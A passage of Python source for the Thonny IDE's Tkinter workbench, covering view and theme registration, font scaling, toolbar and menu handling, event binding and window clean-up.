visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
# assing names to related classes
proxy_class.backend_name = name # type: ignore
if not getattr(config_page_constructor, "backend_name", None):
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(tr("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(tr("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
def add_exercise_provider(self, name, title, class_, sort_key=None):
self._exercise_providers.append(
{"name": name, "title": title, "class": class_, "sort_key": sort_key or title}
)
def get_exercise_providers(self):
return self._exercise_providers
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, ie. when theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
preferred_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if preferred_theme in available_themes:
self._apply_ui_theme(preferred_theme)
elif "Enhanced Clam" in available_themes:
self._apply_ui_theme("Enhanced Clam")
elif "Windows" in available_themes:
self._apply_ui_theme("Windows")
self._apply_syntax_theme(self.get_option("view.syntax_theme"))
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
name, _, _ = self._ui_themes[name]
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=tr("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
tr("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=tr("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
tr("Regular mode"),
tr(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
master=self,
)
label.bind("<1>", on_click, True)
def _init_backend_switcher(self):
if self.get_ui_mode() != "simple":
return
frame = ttk.Frame(self._toolbar)
frame.grid(row=0, column=1001, sticky="ne")
label = ttk.Label(
frame,
text=tr("Python 3 "),
# text="Python 3 ▼ ",
# text="Python 3 ▾ ",
justify="right",
# font="SmallLinkFont",
# style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=0, sticky="ne")
self._gear_menu = tk.Menu(frame, tearoff=False)
def post_menu():
self._gear_menu.delete(0, "end")
self._populate_gear_menu()
self._gear_menu.tk_popup(
button.winfo_rootx(),
button.winfo_rooty() + button.winfo_height(),
)
# ☼
# ≡
button = ttk.Button(frame, text=" ☼ ", style="ViewToolbar.Toolbutton", command=post_menu)
button.grid(row=1, column=0, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
tr("Regular mode"),
tr(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
master=self,
)
label.bind("<1>", on_click, True)
def _populate_gear_menu(self):
"""Constructs the menu for upper-right gear button"""
self._gear_menu.add_checkbutton(
label="Python 3", command=lambda: self._switch_backend_group("CPython")
)
self._gear_menu.add_checkbutton(
label="MicroPython", command=lambda: self._switch_backend_group("MicroPython")
)
self._gear_menu.add_checkbutton(
label="CircuitPython", command=lambda: self._switch_backend_group("CircuitPython")
)
self._gear_menu.add_separator()
self._gear_menu.add_checkbutton(
label=tr("Light"), command=lambda: self._switch_darkness("light")
)
self._gear_menu.add_checkbutton(
label=tr("Dark"), command=lambda: self._switch_darkness("dark")
)
self._gear_menu.add_separator()
self._gear_menu.add_command(
label=tr("Switch to regular mode"), command=self._switch_to_regular_mode
)
def _switch_backend_group(self, group):
pass
def _switch_darkness(self, mode):
pass
def _switch_to_regular_mode(self):
pass
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
If the name contains a period, then the part left to the (first) period
will become the section of the option and rest will become name under that
section.
If the name doesn't contain a period, then it will be added under section
"general".
"""
self._configuration_manager.set_default(name, default_value)
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
name: meant to be used as not translatable menu name
label: translated label, used only when menu with given name doesn't exist yet
"""
if name not in self._menus:
if running_on_mac_os():
conf = {}
else:
conf = get_style_configuration("Menu")
menu = tk.Menu(self._menubar, **conf)
menu["postcommand"] = lambda: self._update_menu(menu, name)
self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
# initially the view will be in it's home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(
self, filename: str, tk_name: Optional[str] = None, disabled=False
) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
if disabled:
filename = os.path.join(
os.path.dirname(filename), "_disabled_" + os.path.basename(filename)
)
if not os.path.exists(filename):
return None
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
if self._scaling_factor >= 2.0:
scaled_filename = filename[:-4] + "_2x.png"
if os.path.exists(scaled_filename):
filename = scaled_filename
else:
img = tk.PhotoImage(file=filename)
# can't use zoom method, because this doesn't allow name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
int(self._scaling_factor),
int(self._scaling_factor),
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView')"""
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto", view.home_widget, text=self._view_records[view_id]["label"] # type: ignore
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return True
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return True
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
# pylint: disable=signature-differs
if not add:
logging.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
def unbind(self, sequence: str, func=None) -> None:
# pylint: disable=arguments-differ
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logger.exception("Can't remove binding for '%s' and '%s'", sequence, func)
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return (
os.environ.get("THONNY_DEBUG", False)
in [
"1",
1,
"True",
True,
"true",
]
or self.get_option("general.debug_mode", False)
)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
# it may be infinity in eg. Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
# According to do documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
try:
shell = self.get_view("ShellView", create=False)
except Exception:
# shell may be not created yet
pass
else:
shell.update_tabs()
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
# Update Treeview font and row height
if running_on_mac_os():
treeview_font_size = int(editor_font_size * 0.7 + 4)
else:
treeview_font_size = int(editor_font_size * 0.7 + 2)
treeview_font = tk_font.nametofont("TreeviewFont")
treeview_font.configure(size=treeview_font_size)
rowheight = round(treeview_font.metrics("linespace") * 1.2)
style = ttk.Style()
style.configure("Treeview", rowheight=rowheight)
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
disabled_image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, 10)
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
if disabled_image is not None:
image_spec = [image, "disabled", disabled_image]
else:
image_spec = image
button = ttk.Button(
group_frame,
image=image_spec,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
def toolbar_handler(*args):
handler(*args)
self._update_toolbar()
if self.focus_get() == button:
# previously selected widget would be better candidate, but this is
# better than button
self._editor_notebook.focus_set()
button.configure(command=toolbar_handler)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
if thonny._runner is None or button.tester and not button.tester():
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(row=1, column=0, sticky=tk.NSEW, in_=widget.master) # type: ignore
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
if dlg.backend_restart_required:
get_runner().restart_backend(False)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
enabled = not tester
if tester:
try:
enabled = tester()
except Exception:
traceback.print_exc()
enabled = False
if enabled:
menu.entryconfigure(i, state=tk.NORMAL)
else:
menu.entryconfigure(i, state=tk.DISABLED)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _poll_ipc_requests(self) -> None:
try:
if self._ipc_requests.empty():
return
while not self._ipc_requests.empty():
args = self._ipc_requests.get()
try:
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
except Exception:
traceback.print_exc()
self.become_active_window()
finally:
self.after(50, self._poll_ipc_requests)
def _on_close(self) -> None:
if self._editor_notebook and not self._editor_notebook.check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give error in Ubuntu
return None
def destroy(self) -> None:
try:
if self._is_server() and os.path.exists(thonny.get_ipc_file_path()):
os.remove(thonny.get_ipc_file_path())
self._closing = True
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
except Exception:
logging.exception("Error while destroying workbench")
finally:
try:
super().destroy()
finally:
runner = get_runner()
if runner != None:
runner.destroy_backend()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logging.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
